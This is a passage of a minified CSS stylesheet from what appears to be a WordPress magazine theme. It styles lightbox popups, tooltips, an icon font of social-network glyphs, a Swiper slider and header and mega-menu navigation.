#3f3f3f; } .mfp-arrow-right { right: 0; } .mfp-arrow-right:after { margin-left: 39px; border-left: 17px solid #fff; } .mfp-arrow-right:before { border-left: 27px solid #3f3f3f; } .mfp-iframe-holder { padding-top: 40px; padding-bottom: 40px; } .mfp-iframe-holder .mfp-content { line-height: 0; width: 100%; max-width: 900px; } .mfp-iframe-scaler { overflow: hidden; width: 100%; height: 0; padding-top: 56.25%; } .mfp-iframe-scaler iframe { position: absolute; top: 0; left: 0; display: block; width: 100%; height: 100%; background: #000; box-shadow: 0 0 8px rgba(0, 0, 0, 0.6); } img.mfp-img { line-height: 0; display: block; box-sizing: border-box; width: auto; max-width: 100%; height: auto; margin: 0 auto; padding: 40px 0 40px; } .mfp-figure { line-height: 0; } .mfp-figure:after { position: absolute; z-index: -1; top: 40px; right: 0; bottom: 40px; left: 0; display: block; width: auto; height: auto; content: ''; background: #444; box-shadow: 0 0 8px rgba(0, 0, 0, 0.6); } .mfp-figure small { font-size: 12px; line-height: 14px; display: block; color: #bdbdbd; } .mfp-figure figure { margin: 0; } .mfp-bottom-bar { position: absolute; top: 100%; left: 0; width: 100%; margin-top: -36px; cursor: auto; } .mfp-title { line-height: 18px; padding-right: 36px; text-align: left; word-wrap: break-word; color: #f3f3f3; } .mfp-image-holder .mfp-content { max-width: 100%; } .mfp-gallery .mfp-image-holder .mfp-figure { cursor: pointer; } .mfp-bg.popup-animation { -webkit-transition: all .5s var(--timing); transition: all .5s var(--timing); opacity: 0; } .mfp-bg.mfp-ready.popup-animation { opacity: .92; } .mfp-bg.mfp-ready.popup-animation.site-access-popup { opacity: .99; } .mfp-removing.mfp-bg.mfp-ready.popup-animation { opacity: 0 !important; } .popup-animation .mfp-content { -webkit-transition: all .5s var(--timing); transition: all .5s var(--timing); opacity: 0; } .popup-animation.mfp-ready .mfp-content { opacity: 1; } .popup-animation.mfp-removing .mfp-content { opacity: 0; } .tipsy { position: absolute; z-index: 100000; padding: 5px; } .tipsy-inner { font-size: var(--meta-fsize); line-height: 1; max-width: 200px; padding: 7px 10px; text-align: center; color: var(--absolute-white); border-radius: var(--round-3); background-color: var(--dark-accent); } .tipsy-arrow { line-height: 0; position: absolute; width: 0; height: 0; border: 5px dashed var(--dark-accent); } body.rtl .tipsy-e .tipsy-arrow { /*rtl:ignore*/ right: 0; /*rtl:ignore*/ left: auto; /*rtl:ignore*/ -webkit-transform: scale(-1, 1); /*rtl:ignore*/ transform: scale(-1, 1); } .rtl .rbi.rbi-pin:before, .rtl .rbi.rbi-behance:before, .rtl .rbi.rbi-digg:before, .rtl .rbi.rbi-dribbble:before, .rtl .rbi.rbi-instagram:before, .rtl .rbi.rbi-linkedin:before, .rtl .rbi.rbi-pinterest:before, .rtl .rbi.rbi-reddit:before, .rtl .rbi.rbi-skype:before, .rtl .rbi.rbi-soundcloud:before, .rtl .rbi.rbi-spotify:before, .rtl .rbi.rbi-stripe:before, .rtl .rbi.rbi-stumbleupon:before, .rtl .rbi.rbi-telegram:before, .rtl .rbi.rbi-tiktok:before, .rtl .rbi.rbi-tumblr:before, .rtl .rbi.rbi-twitter:before, .rtl .rbi.rbi-viber:before, .rtl .rbi.rbi-vimeo:before, .rtl .rbi.rbi-vk:before, .rtl .rbi.rbi-waze:before, .rtl .rbi.rbi-whatsapp:before, .rtl .rbi.rbi-yelp:before, .rtl .rbi.rbi-youtube:before, .rtl .rbi.rbi-myspace:before, .rtl .rbi.rbi-rss:before, .rtl .rbi.rbi-print:before, .rtl .rbi.rbi-facebook:before { /*rtl:ignore*/ -webkit-transform: none; /*rtl:ignore*/ transform: none; } .tipsy-arrow-n { border-bottom-color: var(--dark-accent); } .tipsy-n .tipsy-arrow { top: 0; left: 50%; margin-left: -5px; border-top: none; border-right-color: transparent; border-bottom-style: solid; border-left-color: transparent; } .tipsy-w .tipsy-arrow { top: 50%; left: 0; margin-top: -5px; border-top-color: transparent; border-right-style: solid; border-bottom-color: transparent; border-left: none; } .tipsy-e .tipsy-arrow { top: 50%; right: 0; margin-top: -5px; border-top-color: transparent; border-right: none; border-bottom-color: transparent; border-left-style: solid; } .tipsy-s .tipsy-arrow { bottom: 0; left: 50%; margin-left: -5px; border-top-style: solid; border-right-color: transparent; border-bottom: none; border-left-color: transparent; } /* ----------------- 3 - Font Icons ----------------- */ @font-face { font-family: 'ruby-icon'; src: url('../fonts/icons.ttf?v=1.1') format('truetype'), url('/../fonts/icons.woff?v=1.1') format('woff'), url('/../fonts/icons.svg?v=1.1#ruby-icon') format('svg'); font-weight: normal; font-style: normal; font-display: swap; } .rbi, [class^='rbi-'], [class='rbi-'] { font-family: 'ruby-icon' !important; font-weight: normal; font-style: normal; font-variant: normal; text-transform: none; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; speak: none; } body.rtl .rbi:before { /*rtl:ignore*/ display: inline-block; /*rtl:ignore*/ -webkit-transform: scale(-1, 1); /*rtl:ignore*/ transform: scale(-1, 1); /*rtl:ignore*/ -ms-filter: 'progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)'; } .rbi-copy:before { content: '\e965'; } .rbi-pin:before { content: '\e962'; } .rbi-notification:before { content: '\e95a'; } .rbi-information:before { content: '\e95c'; } .rbi-shield:before { content: '\e95e'; } .rbi-next:before { content: '\e958'; } .rbi-prev:before { content: '\e959'; } .rbi-resize:before { content: '\e961'; } .rbi-help:before { content: '\e95b'; } .rbi-minus-o:before { content: '\e95d'; } .rbi-cancel:before { content: '\e95f'; } .rbi-check:before { content: '\e960'; } .rbi-gallery:before { content: '\e955'; } .rbi-audio:before { content: '\e956'; } .rbi-video:before { content: '\e957'; } .rbi-darrow-top:before { content: '\e94a'; } .rbi-search:before { content: '\e946'; } .rbi-watch:before { content: '\e93a'; } .rbicolorose:before { content: '\e949'; } .rbi-home:before { content: '\e952'; } .rbi-portfolio:before { content: '\e901'; } .rbi-menu:before { content: '\e953'; } .rbi-chart:before { content: '\e929'; } .rbi-suitcase:before { content: '\e94d'; } .rbi-clock:before { content: '\e947'; } .rbi-time:before { content: '\e948'; } .rbi-comment:before { content: '\e945'; } .rbi-email:before { content: '\e908'; } .rbi-share:before { content: '\e94e'; } .rbi-load:before { content: '\e942'; } .rbi-read:before { content: '\e94c'; } .rbi-archive:before { content: '\e944'; } .rbi-tag:before { content: '\e94b'; } .rbi-print:before { content: '\e909'; } .rbi-500px:before { content: '\e90a'; } .rbi-amazon:before { content: '\e90b'; } .rbi-store:before { content: '\e90c'; } .rbi-behance:before { content: '\e90d'; } .rbi-blogger:before { content: '\e90f'; } .rbi-chromecast:before { content: '\e911'; } .rbi-digg:before { content: '\e912'; } .rbi-dribbble:before { content: '\e913'; } .rbi-dropbox:before { content: '\e914'; } .rbi-ebay:before { content: '\e93f'; } .rbi-etsy:before { content: '\e940'; } .rbi-facebook:before { content: '\e915'; } .rbi-messenger:before { content: '\e916'; } .rbi-flickr:before { content: '\e917'; } .rbi-flipboard:before { content: '\e918'; } .rbi-github:before { content: '\e919'; } .rbi-google:before { content: '\e91a'; } .rbi-drive:before { content: '\e91b'; } .rbi-play:before { content: '\e91c'; } .rbi-wallet:before { content: '\e91d'; } .rbi-instagram:before { content: '\e91e'; } .rbi-linkedin:before { content: '\e91f'; } .rbi-mailchimp:before { content: '\e920'; } .rbi-medium:before { content: '\e921'; } .rbi-paypal:before { content: '\e922'; } .rbi-pinterest:before { content: '\e923'; } .rbi-quora:before { content: '\e941'; } .rbi-reddit:before { content: '\e928'; } .rbi-skype:before { content: '\e92a'; } .rbi-snapchat:before { content: '\e92b'; } .rbi-soundcloud:before { content: '\e92c'; } .rbi-spotify:before { content: '\e92d'; } .rbi-stripe:before { content: '\e92e'; } .rbi-stumbleupon:before { content: '\e92f'; } .rbi-telegram:before { content: '\e930'; } .rbi-tiktok:before { content: '\e943'; } .rbi-tripadvisor:before { content: '\e931'; } .rbi-tumblr:before { content: '\e932'; } .rbi-twitch:before { content: '\e933'; } .rbi-twitter:before { content: '\e934'; } .rbi-viber:before { content: '\e936'; } .rbi-vimeo:before { content: '\e937'; } .rbi-vk:before { content: '\e938'; } .rbi-waze:before { content: '\e939'; } .rbi-whatsapp:before { content: '\e93b'; } .rbi-wordpress:before { content: '\e93c'; } .rbi-yelp:before { content: '\e93d'; } .rbi-youtube:before { content: '\e93e'; } .rbi-bookmark-fill:before { content: '\e906'; } .rbi-bookmark:before { content: '\e907'; } .rbi-plus:before { content: '\e900'; } .rbi-cright:before { content: '\e902'; } .rbi-cleft:before { content: '\e903'; } .rbi-cdown:before { content: '\e904'; } .rbi-cup:before { content: '\e905'; } .rbi-thumbs-up:before { content: '\e86d'; } .rbi-minus:before { content: '\e90e'; } .rbi-myspace:before { content: '\30'; } .rbi-heart:before { content: '\6c'; } .rbi-rss:before { content: '\42'; } .rbi-angle-down:before { content: '\e924'; } .rbi-angle-left:before { content: '\e925'; } .rbi-angle-right:before { content: '\e926'; } .rbi-angle-up:before { content: '\e927'; } .rbi-cart:before { content: '\e963'; } .rbi-trash:before { content: '\e964'; } .rbi-via:before { content: '\e935'; } .rbi-trending:before { content: '\e954'; } .rbi-bitcoin:before { content: '\e910'; } .rbi-star-half:before { content: '\e950'; } .rbi-star-o:before { content: '\e94f'; } .rbi-star:before { content: '\e951'; } /* ----------------- 4 - Swiper Slider ----------------- */ .swiper-container { position: relative; z-index: 1; overflow: hidden; margin-right: auto; margin-left: auto; padding: 0; list-style: none; } .pre-load:not(.swiper-container-initialized) { max-height: 0; } .swiper-container-vertical > .swiper-wrapper { flex-direction: column; } .swiper-wrapper { position: relative; z-index: 1; display: flex; box-sizing: content-box; width: 100%; height: 100%; transition-property: transform; } .swiper-container-android .swiper-slide, .swiper-wrapper { transform: translate3d(0px, 0, 0); } .swiper-container-multirow > .swiper-wrapper { flex-wrap: wrap; } .swiper-container-multirow-column > .swiper-wrapper { flex-direction: column; flex-wrap: wrap; } .swiper-container-free-mode > .swiper-wrapper { margin: 0 auto; transition-timing-function: ease-out; } .swiper-container-pointer-events { touch-action: pan-y; } .swiper-container-pointer-events.swiper-container-vertical { touch-action: pan-x; } .swiper-slide { position: relative; flex-shrink: 0; width: 100%; height: 100%; transition-property: transform; } .swiper-slide-invisible-blank { visibility: hidden; } .swiper-container-autoheight, .swiper-container-autoheight .swiper-slide { height: auto; } .swiper-container-autoheight .swiper-wrapper { align-items: flex-start; transition-property: transform, height; } .swiper-container-3d { perspective: 1200px; } .swiper-container-3d .swiper-wrapper, .swiper-container-3d .swiper-slide, .swiper-container-3d .swiper-slide-shadow-left, .swiper-container-3d .swiper-slide-shadow-right, .swiper-container-3d .swiper-slide-shadow-top, .swiper-container-3d .swiper-slide-shadow-bottom, .swiper-container-3d .swiper-cube-shadow { transform-style: preserve-3d; } .swiper-container-3d .swiper-slide-shadow-left, .swiper-container-3d .swiper-slide-shadow-right, .swiper-container-3d .swiper-slide-shadow-top, .swiper-container-3d .swiper-slide-shadow-bottom { position: absolute; z-index: 10; top: 0; left: 0; width: 100%; height: 100%; pointer-events: none; } .swiper-container-3d .swiper-slide-shadow-left { background-image: linear-gradient(to left, rgba(0, 0, 0, 0.5), rgba(0, 0, 0, 0)); } .swiper-container-3d .swiper-slide-shadow-right { background-image: linear-gradient(to right, rgba(0, 0, 0, 0.5), rgba(0, 0, 0, 0)); } .swiper-container-3d .swiper-slide-shadow-top { background-image: linear-gradient(to top, rgba(0, 0, 0, 0.5), rgba(0, 0, 0, 0)); } .swiper-container-3d .swiper-slide-shadow-bottom { background-image: linear-gradient(to bottom, rgba(0, 0, 0, 0.5), rgba(0, 0, 0, 0)); } .swiper-container-css-mode > .swiper-wrapper { overflow: auto; scrollbar-width: none; -ms-overflow-style: none; } .swiper-container-css-mode > .swiper-wrapper::-webkit-scrollbar { display: none; } .swiper-container-css-mode > .swiper-wrapper > .swiper-slide { scroll-snap-align: start start; } .swiper-container-horizontal.swiper-container-css-mode > .swiper-wrapper { scroll-snap-type: x mandatory; } .swiper-container-vertical.swiper-container-css-mode > .swiper-wrapper { scroll-snap-type: y mandatory; } .swiper-button-prev, .swiper-button-next { position: absolute; z-index: 10; top: 50%; display: flex; align-items: center; justify-content: center; width: calc(var(--swiper-navigation-size) / 44 * 27); height: var(--swiper-navigation-size); margin-top: calc(0px - (var(--swiper-navigation-size) / 2)); cursor: pointer; color: var(--swiper-navigation-color, var(--g-color)); } .swiper-button-prev.swiper-button-disabled, .swiper-button-next.swiper-button-disabled { cursor: auto; pointer-events: none; opacity: 0.35; } .swiper-button-prev:after, .swiper-button-next:after { font-size: var(--swiper-navigation-size); font-variant: initial; line-height: 1; letter-spacing: 0; text-transform: none; } .swiper-button-prev, .swiper-container-rtl .swiper-button-next { /*rtl:ignore*/ right: auto; /*rtl:ignore*/ left: 10px; } .swiper-button-prev:after, .swiper-container-rtl .swiper-button-next:after { /*rtl:ignore*/ content: 'prev'; } .swiper-button-next, .swiper-container-rtl .swiper-button-prev { /*rtl:ignore*/ right: 10px; /*rtl:ignore*/ left: auto; } .swiper-button-next:after, .swiper-container-rtl .swiper-button-prev:after { /*rtl:ignore*/ content: 'next'; } .swiper-button-prev.swiper-button-white, .swiper-button-next.swiper-button-white { --swiper-navigation-color: #fff; } .swiper-button-prev.swiper-button-black, .swiper-button-next.swiper-button-black { --swiper-navigation-color: #000; } .swiper-button-lock { display: none; } .swiper-pagination { position: absolute; z-index: 10; transition: 300ms opacity; transform: translate3d(0, 0, 0); text-align: center; } .swiper-pagination.swiper-pagination-hidden { opacity: 0; } .swiper-pagination-fraction, .swiper-pagination-custom, .swiper-container-horizontal > .swiper-pagination-bullets { bottom: 10px; left: 0; width: 100%; } .swiper-pagination-bullet, body .swiper-pagination-bullet { position: relative; display: inline-block; width: 16px; height: 16px; margin-right: 0; margin-left: 0; -webkit-transition: -webkit-transform .25s var(--timing); transition: transform .25s var(--timing); opacity: .4; background: none; } .swiper-pagination-bullet:before { position: absolute; top: 0; left: 0; width: 100%; height: 100%; content: ''; -webkit-transform: scale(.5); transform: scale(.5); pointer-events: none; color: inherit; -webkit-border-radius: 100%; border-radius: 100%; background: currentColor; } .swiper-pagination-bullet.swiper-pagination-bullet-active { opacity: 1; } .swiper-pagination-bullet.swiper-pagination-bullet-active:before { -webkit-transform: scale(.75); transform: scale(.75); } button.swiper-pagination-bullet { margin: 0; padding: 0; border: none; box-shadow: none; -webkit-appearance: none; appearance: none; } .swiper-pagination-bullet-active { opacity: 1; } .swiper-container-vertical > .swiper-pagination-bullets { top: 50%; right: 10px; transform: translate3d(0px, -50%, 0); } .swiper-container-vertical > .swiper-pagination-bullets .swiper-pagination-bullet { display: block; margin: 6px 0; } .swiper-container-vertical > .swiper-pagination-bullets.swiper-pagination-bullets-dynamic { top: 50%; width: 8px; transform: translateY(-50%); } .swiper-container-vertical > .swiper-pagination-bullets.swiper-pagination-bullets-dynamic .swiper-pagination-bullet { display: inline-block; transition: 200ms transform, 200ms top; } .block-wrap .swiper-container-horizontal > .swiper-pagination-bullets .swiper-pagination-bullet { margin: 0; } .swiper-container-horizontal > .swiper-pagination-bullets.swiper-pagination-bullets-dynamic { left: 50%; transform: translateX(-50%); white-space: nowrap; } .swiper-container-horizontal > .swiper-pagination-bullets.swiper-pagination-bullets-dynamic .swiper-pagination-bullet { transition: 200ms transform, 200ms left; } .swiper-container-horizontal.swiper-container-rtl > .swiper-pagination-bullets-dynamic .swiper-pagination-bullet { /*rtl:ignore*/ transition: 200ms transform, 200ms right; } .swiper-pagination-progressbar { position: absolute; background: var(--dark-accent-90); } body .swiper-pagination-progressbar .swiper-pagination-progressbar-fill { position: absolute; top: 0; left: 0; width: 100%; height: 100%; transform: scale(0); transform-origin: left top; background: var(--g-color); } .swiper-container-rtl .swiper-pagination-progressbar .swiper-pagination-progressbar-fill { /*rtl:ignore*/ transform-origin: right top; } .swiper-container-horizontal > .swiper-pagination-progressbar, .swiper-container-vertical > .swiper-pagination-progressbar.swiper-pagination-progressbar-opposite { right: 30%; bottom: 15px; left: 30%; overflow: hidden; height: 3px; border-radius: 5px; } .swiper-container-vertical > .swiper-pagination-progressbar, .swiper-container-horizontal > .swiper-pagination-progressbar.swiper-pagination-progressbar-opposite { top: 0; left: 0; height: 2px; } .swiper-pagination-lock { display: none; } .swiper-scrollbar { position: relative; border-radius: var(--round-7); background: var(--dark-accent-90); -ms-touch-action: none; } .swiper-container-horizontal > .swiper-scrollbar { position: absolute; z-index: 50; bottom: 3px; left: 1%; width: 98%; height: 5px; } .swiper-container-vertical > .swiper-scrollbar { position: absolute; z-index: 50; top: 1%; right: 3px; width: 5px; height: 98%; } .swiper-scrollbar-drag { position: relative; top: 0; left: 0; width: 100%; height: 100%; border-radius: var(--round-7); background: var(--g-color); } .swiper-scrollbar-cursor-drag { cursor: move; } .swiper-scrollbar-lock { display: none; } .swiper-zoom-container { display: flex; align-items: center; justify-content: center; width: 100%; height: 100%; text-align: center; } .swiper-zoom-container > img, .swiper-zoom-container > svg, .swiper-zoom-container > canvas { max-width: 100%; max-height: 100%; object-fit: contain; } .swiper-slide-zoomed { cursor: move; } .swiper-lazy-preloader { position: absolute; z-index: 10; top: 50%; left: 50%; box-sizing: border-box; width: 42px; height: 42px; margin-top: -21px; margin-left: -21px; transform-origin: 50%; animation: swiper-preloader-spin 1s infinite linear; border: 4px solid var(--swiper-preloader-color, var(--g-color)); border-top-color: transparent; border-radius: 50%; } .swiper-lazy-preloader-white { --swiper-preloader-color: #fff; } .swiper-lazy-preloader-black { --swiper-preloader-color: #000; } @keyframes swiper-preloader-spin { 100% { transform: rotate(360deg); } } .swiper-container .swiper-notification { position: absolute; z-index: -1000; top: 0; left: 0; pointer-events: none; opacity: 0; } .swiper-container-fade.swiper-container-free-mode .swiper-slide { transition-timing-function: ease-out; } .swiper-container-fade .swiper-slide { transition-property: opacity; pointer-events: none; } .swiper-container-fade .swiper-slide .swiper-slide { pointer-events: none; } .swiper-container-fade .swiper-slide-active, .swiper-container-fade .swiper-slide-active .swiper-slide-active { pointer-events: auto; } .swiper-container-cube { overflow: visible; } .swiper-container-cube .swiper-slide { z-index: 1; visibility: hidden; width: 100%; height: 100%; transform-origin: 0 0; pointer-events: none; -webkit-backface-visibility: hidden; backface-visibility: hidden; } .swiper-container-cube .swiper-slide .swiper-slide { pointer-events: none; } .swiper-container-cube.swiper-container-rtl .swiper-slide { /*rtl:ignore*/ transform-origin: 100% 0; } .swiper-container-cube .swiper-slide-active, .swiper-container-cube .swiper-slide-active .swiper-slide-active { pointer-events: auto; } .swiper-container-cube .swiper-slide-active, .swiper-container-cube .swiper-slide-next, .swiper-container-cube .swiper-slide-prev, .swiper-container-cube .swiper-slide-next + .swiper-slide { visibility: visible; pointer-events: auto; } .swiper-container-cube .swiper-slide-shadow-top, .swiper-container-cube .swiper-slide-shadow-bottom, .swiper-container-cube .swiper-slide-shadow-left, .swiper-container-cube .swiper-slide-shadow-right { z-index: 0; -webkit-backface-visibility: hidden; backface-visibility: hidden; } .swiper-container-cube .swiper-cube-shadow { position: absolute; z-index: 0; bottom: 0; left: 0; width: 100%; height: 100%; opacity: 0.6; } .swiper-container-cube .swiper-cube-shadow:before { position: absolute; top: 0; right: 0; bottom: 0; left: 0; content: ''; background: #000; filter: blur(50px); -webkit-filter: blur(50px); } .swiper-container-flip { overflow: visible; } .swiper-container-flip .swiper-slide { z-index: 1; pointer-events: none; -webkit-backface-visibility: hidden; backface-visibility: hidden; } .swiper-container-flip .swiper-slide .swiper-slide { pointer-events: none; } .swiper-container-flip .swiper-slide-active, .swiper-container-flip .swiper-slide-active .swiper-slide-active { pointer-events: auto; } .swiper-container-flip .swiper-slide-shadow-top, .swiper-container-flip .swiper-slide-shadow-bottom, .swiper-container-flip .swiper-slide-shadow-left, .swiper-container-flip .swiper-slide-shadow-right { z-index: 0; -webkit-backface-visibility: hidden; backface-visibility: hidden; } /* ----------------- 5 - Header ----------------- */ .header-wrap { position: relative; display: block; } .header-fw .navbar-wrap > .rb-container, .header-fw.header-4 .logo-sec > .rb-container { max-width: 100%; } .navbar-wrap { position: relative; z-index: 999; display: block; } .header-mobile { display: none; } #amp-header .header-mobile { display: block; } .navbar-transparent { background-color: transparent; } .navbar-transparent .navbar-inner { border-bottom: 1px solid #ffffff26; } .sticky-on .navbar-transparent .navbar-inner { border-color: transparent; } .navbar-wrap:not(.navbar-transparent), .sticky-on .navbar-wrap { background: var(--nav-bg); background: -webkit-linear-gradient(left, var(--nav-bg-from) 0%, var(--nav-bg-to) 100%); background: linear-gradient(to right, var(--nav-bg-from) 0%, var(--nav-bg-to) 100%); } .style-shadow .navbar-wrap:not(.navbar-transparent), .sticky-on .navbar-wrap { -webkit-box-shadow: 0 4px 30px var(--shadow-7); box-shadow: 0 4px 30px var(--shadow-7); } .header-fw.style-d-border .navbar-wrap:not(.navbar-transparent):after, .header-fw.style-tbd-border .navbar-wrap:not(.navbar-transparent):after, .header-wrapper.style-d-border .navbar-wrap:not(.navbar-transparent) .navbar-inner:after, .header-wrapper.style-tbd-border .navbar-wrap:not(.navbar-transparent) .navbar-inner:after { position: absolute; right: 0; bottom: 0; left: 0; width: 100%; height: 0; content: ''; pointer-events: none; border-bottom: 2px solid currentColor; } .header-fw.style-border .navbar-wrap:not(.navbar-transparent):after, .header-wrapper.style-border .navbar-wrap:not(.navbar-transparent) .navbar-inner:after { position: absolute; top: auto; right: 0; bottom: 0; left: 0; width: 100%; height: 0; content: ''; pointer-events: none; border-bottom: 1px solid var(--flex-gray-15); } .header-fw.style-tbd-border .navbar-wrap:not(.navbar-transparent):before, .header-wrapper.style-tbd-border .navbar-wrap:not(.navbar-transparent) .navbar-inner:before { position: absolute; top: 0; right: 0; bottom: auto; left: 0; width: 100%; height: 0; content: ''; pointer-events: none; border-bottom: 2px solid currentColor; } .header-4 .navbar-wrap:not(.navbar-transparent):before { position: absolute; top: 0; right: 0; left: 0; width: 100%; height: 0; content: ''; pointer-events: none; border-bottom: 1px solid var(--flex-gray-15); } .header-4 .navbar-wrap:not(.navbar-transparent):after, .header-5.style-tb-border.header-fw .navbar-wrap:not(.navbar-transparent):after, .header-5.style-tb-border.header-wrapper .navbar-wrap:not(.navbar-transparent) .navbar-inner:after { position: absolute; right: 0; bottom: 0; left: 0; width: 100%; height: 0; content: ''; pointer-events: none; border-bottom: 1px solid var(--flex-gray-15); } .header-5.style-tb-shadow-border.header-wrapper .navbar-wrap:not(.navbar-transparent) .navbar-inner:before, .header-5.style-tb-shadow-border.header-fw .navbar-wrap:not(.navbar-transparent):before, .header-5.style-tb-border.header-fw .navbar-wrap:not(.navbar-transparent):before, .header-5.style-tb-border.header-wrapper .navbar-wrap:not(.navbar-transparent) .navbar-inner:before { position: absolute; top: 0; right: 0; bottom: auto; left: 0; width: 100%; height: 0; content: ''; pointer-events: none; border-bottom: 1px solid var(--flex-gray-15); } .header-5.style-tb-shadow-border .navbar-wrap:not(.navbar-transparent) { -webkit-box-shadow: 0 10px 10px var(--shadow-2); box-shadow: 0 10px 10px var(--shadow-2); } .navbar-inner { position: relative; display: flex; display: -webkit-flex; align-items: stretch; flex-flow: row nowrap; justify-content: space-between; max-width: 100%; min-height: var(--nav-height); } .navbar-left, .navbar-right, .navbar-center { display: flex; display: -webkit-flex; align-items: stretch; flex-flow: row nowrap; } .navbar-left { flex-grow: 1; } .header-3 .navbar-wrap .navbar-left, .header-3 .navbar-wrap .navbar-right { flex-grow: 0; } .header-3 .navbar-wrap .navbar-center { flex-grow: 1; justify-content: center; } .logo-wrap { display: flex; display: -webkit-flex; align-items: center; flex-shrink: 0; max-height: 100%; margin-right: 20px; } .the-logo a { -webkit-transition: opacity .25s var(--timing); transition: opacity .25s var(--timing); } .the-logo img { max-width: 100%; } .logo-wrap a { max-height: 100%; } .is-image-logo.logo-wrap a { display: block; } .logo-wrap img { display: block; width: auto; max-height: var(--nav-height); -webkit-transition: opacity .25s var(--timing); transition: opacity .25s var(--timing); object-fit: cover; } .is-hd-4, .is-hd-5 { --nav-height: 40px; } .header-4 .logo-wrap:not(.mobile-logo-wrap) img { max-height: var(--hd4-logo-height, 60px); } .header-5 .logo-wrap:not(.mobile-logo-wrap) img { max-height: var(--hd5-logo-height, 60px); } .header-4 .main-menu > li > a, .header-4 .more-section-outer .more-trigger { padding-right: var(--menu-item-spacing, 20px); padding-left: var(--menu-item-spacing, 20px); border-left: 1px solid var(--flex-gray-15); } .header-4.header-fw .main-menu > li:first-child > a { border-left: none; } .header-5 .logo-sec-left, .header-5 .logo-sec-center, .header-5 .logo-sec-right { position: relative; display: flex; flex: 0 0 33.33%; margin: 0; } .header-5 .logo-sec-left { line-height: 1; align-items: center; } .logo-sec-left > *:not(:last-child):before { position: absolute; top: .4em; right: 0; bottom: .4em; display: block; content: ''; border-right: 1px solid var(--nav-color-10); } .header-5 .logo-sec-center { justify-content: center; } .header-5 .logo-wrap:not(.mobile-logo-wrap) { margin: 0; } .header-5 .logo-sec-right { align-items: stretch; justify-content: flex-end; } .header-5 .navbar-center { justify-content: center; width: 100%; } .more-section-outer .more-trigger, .logo-sec { padding-top: 15px; padding-bottom: 15px; } .logo-sec-inner { display: flex; align-items: center; flex-flow: row nowrap; } .logo-sec-center { margin: 0 auto; } .logo-sec-right { display: flex; align-items: center; flex-flow: row nowrap; margin-left: auto; } .logo-sec-right > * { padding-right: 10px; padding-left: 10px; } .logo-sec-right .header-search-form { margin-bottom: 0; } .logo-sec-right .search-form-inner { min-width: 320px; background-color: var(--flex-gray-7); } .header-social-list > a { padding-right: 5px; padding-left: 5px; } .is-logo-svg img { width: auto; height: 999px; object-fit: contain; } .the-logo a:hover, .logo-wrap a:hover img { opacity: .7; } .logo-wrap.is-text-logo { align-items: center; } .is-text-logo .logo-title > * { position: relative; display: inline-block; letter-spacing: -.05em; text-transform: uppercase; color: var(--nav-color); } .is-text-logo .logo-title > *:first-letter { color: var(--g-color); } .navbar-right > * { position: static; display: flex; display: -webkit-flex; align-items: center; height: 100%; } .navbar-outer .navbar-right > * { color: var(--nav-color); } .large-menu > li { position: relative; display: block; float: left; } .large-menu .sub-menu li, .menu-has-child-flex { position: relative; } .large-menu .sub-menu, .header-dropdown { position: absolute; z-index: 9999; top: -9999px; right: auto; left: 0; display: block; visibility: hidden; min-width: 210px; margin-top: 20px; -webkit-transition: top 0s, opacity .25s var(--timing), margin .25s var(--timing); transition: top 0s, opacity .25s var(--timing), margin .25s var(--timing); pointer-events: none; opacity: 0; border-radius: var(--round-7); } .mega-dropdown, .flex-dropdown { position: absolute; z-index: 888; top: -9999px; /*rtl:ignore*/ right: auto; /*rtl:ignore*/ left: -10%; display: block; overflow: hidden; min-width: 180px; margin-top: 20px; cursor: auto; -webkit-transition: top 0s ease .25s, opacity .25s var(--timing), margin .25s var(--timing) .25s; transition: top 0s ease .25s, opacity .25s var(--timing), margin .25s var(--timing) .25s; pointer-events: none; opacity: 0; background: transparent; } .mega-dropdown-inner:not(.mega-template-inner) { border-radius: var(--round-7); background: var(--subnav-bg); background: -webkit-linear-gradient(left, var(--subnav-bg-from) 0%, var(--subnav-bg-to) 100%); background: linear-gradient(to right, var(--subnav-bg-from) 0%, var(--subnav-bg-to) 100%); -webkit-box-shadow: 0 4px 30px var(--shadow-7); box-shadow: 0 4px 30px var(--shadow-7); } .mega-dropdown { width: 100vw; } .more-section-inner { width: var(--more-width, auto); max-width: 100vw; pointer-events: auto; color: var(--subnav-color); border-radius: var(--round-7); background: var(--subnav-bg); background: -webkit-linear-gradient(left, var(--subnav-bg-from) 0%, var(--subnav-bg-to) 100%); background: linear-gradient(to right, var(--subnav-bg-from) 0%, var(--subnav-bg-to) 100%); -webkit-box-shadow: 0 4px 30px var(--shadow-7); box-shadow: 0 4px 30px var(--shadow-7); } .more-section .heading-title > * { color: var(--subnav-color); } .large-menu > li:hover > .sub-menu, .large-menu > li:hover > .header-dropdown, .header-dropdown-outer.dropdown-activated .header-dropdown { top: calc(100% - 1px); bottom: auto; visibility: visible; max-width: 1240px; margin-top: 0; pointer-events: auto; opacity: 1; } li.menu-item.mega-menu-loaded:hover > .mega-dropdown, li.menu-item.mega-menu-loaded:hover > .flex-dropdown, .menu-has-child-flex.dropdown-activated .flex-dropdown { top: calc(100% - 1px); bottom: auto; visibility: visible; margin-top: 0; -webkit-transition: top 0s ease 0s, opacity .25s var(--timing), margin .25s var(--timing) 0s; transition: top 0s ease 0s, opacity .25s var(--timing), margin .25s var(--timing) 0s; opacity: 1; } .large-menu .sub-menu .sub-menu { top: -10px; left: 100%; margin-top: 0; margin-left: 20px; } .large-menu .sub-menu li:hover > .sub-menu { left: calc(100% - 5px); visibility: visible; margin-left: 0; pointer-events: auto; opacity: 1; } .sub-menu-title { font-size: var(--em-mini); line-height: 1; position: absolute; top: -3px; left: 100%; margin-left: 5px; padding: 2px 5px; color: var(--subnav-color); border-radius: var(--round-3); background: #eee; } .menu-has-child-mega .mega-dropdown-inner .sub-menu { display: none; } .mega-header { display: flex; align-items: center; flex-flow: row nowrap; width: 100%; margin-bottom: 20px; } .mega-header:not(.mega-header-fw) { padding-bottom: 5px; border-bottom: 1px solid var(--subnav-color-10); } .mega-link { display: inline-flex; align-items: center; margin-left: auto; -webkit-transition: var(--effect); transition: var(--effect); } .mega-link i { margin-left: 3px; -webkit-transition: var(--effect); transition: var(--effect); } .mega-link:hover { color: var(--g-color); } .mega-link:hover i { -webkit-transform: translateX(3px); transform: translateX(3px); } .is-mega-category .block-grid-small-1 .p-wrap { margin-bottom: 0; } .mega-dropdown-inner { width: 100%; padding: 20px 20px 30px 20px; pointer-events: auto; } .mega-template-inner { pointer-events: auto; } .flex-dropdown .mega-template-inner { border-radius: var(--round-5); -webkit-box-shadow: 0 